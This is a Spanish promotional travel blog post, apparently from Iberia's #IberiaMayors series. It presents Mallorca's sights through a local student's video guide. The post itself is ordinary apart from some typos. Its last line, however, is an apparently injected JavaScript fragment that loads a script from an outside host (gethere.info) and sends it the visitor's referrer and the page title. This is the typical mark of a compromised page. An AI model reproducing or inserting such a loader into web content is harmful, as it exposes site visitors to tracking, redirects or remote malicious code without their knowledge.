¡Encanto mediterráneo con nuestra #IberiaMayors Mallorca!

03/12/2014

Iberia_Mayors_mayors_ficha_Mallorca

Si buscas un destino Mediterráneo con unas vistas y una cultura que enamoran, ¡estás de enhorabuena! Hoy, nuestra moderna #IberiaMayors Mallorca, te presenta el encanto mediterráneo en una sola isla.

Elena, una joven estudiante de turismo y apasionada de su ciudad, te presenta en su vídeo-guía los rincones más especiales de Mallorca y las anécdotas más curiosas de su ciudad. Antes de empezar este recomendable recorrido, no olvides sintonizar «Todo lo que puedo dar», de Jaime Anglada, la mejor banda sonora mallorquina. Ahora sí, ¡estamos listos!

Si, como a nuestra #IberiaMayors, te encanta la fotografía y descubrir rincones escondidos en plena ciudad, ¡Mallorca ha de ser tu próximo destino! Elena te recomienda los lugares imprescincibles de la islaLa Ramba de las flores, el Castillo de Bellver con las mejores vistas de la ciudad, el Portitxol -un encantador puerto de pescadores-… No dejes de visitar en tu viaje los maravillosos patios señoriales mallorquines abiertos al público, ¡para enamorarse!

Iberia_Mayors_mayors_bannerblog_Mallorca

Junto a sus recomendaciones, Elena, nuestra joven #IberiaMayors, te cuenta anécdotas y curiosidades de la Catedral de Palma de Mallorca, ¿quieres descubrirlas? ¡No te pierdas su vídeo-guía!

Un paseo por la playa o el Casco antiguo, una tarde de compras, todo un día perdiéndose entre sus edificios históricos, una noche en el mejor ambiente del Paseo Marítimo… ¡Haz de Mallorca tu próximo destino! 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;